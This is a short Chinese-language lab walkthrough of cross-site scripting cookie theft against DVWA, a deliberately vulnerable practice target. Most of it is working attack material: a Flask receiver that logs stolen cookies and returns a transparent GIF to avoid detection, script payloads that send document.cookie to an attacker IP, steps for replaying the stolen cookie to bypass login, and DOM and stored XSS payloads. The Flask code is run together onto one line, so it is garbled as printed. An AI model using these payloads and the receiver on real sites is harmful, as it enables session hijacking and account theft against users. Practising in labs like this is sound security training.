1、接收cookie端攻擊機上用python寫個接收web程序flask
from flask import Flask, request, Responseapp = Flask(__name__)@app.route('/')
def save_cookie():cookie = request.args.get('cookie', '')if cookie:with open('/root/cookies.txt', 'a') as f:f.write(f"{cookie}\n")# 返回1x1透明GIF(避免被用戶察覺)return Response(b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;', mimetype='image/gif')if __name__ == '__main__':app.run(host='0.0.0.0', port=80)
2、dvwa靶機上進行xss測試(3種方法)
<script>document.location='http://192.168.168.130/?cookie='+document.cookie;</script>
<script>fetch('http://192.168.168.130/?cookie=' + document.cookie);</script>
3、把獲取的cookie中最后一個等號后面的是cookie值,打開火狐按F12,點擊存儲store,把獲取的cookie值替換進去,就能直接打開不用賬戶密碼了
???
dvwa中DOM型注入(直接在xss的dom網址上改后面的default=就能獲取cookie)
http://192.168.168.133/dvwa-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie);</script>
???
dvwa中存儲型注入(先按F12把name表單長度改長一點)
name中輸入:
<script>alert(document.cookie);</script>
message中隨便輸入:Payload
以后每次打開這個存儲型頁面就會彈cookie出來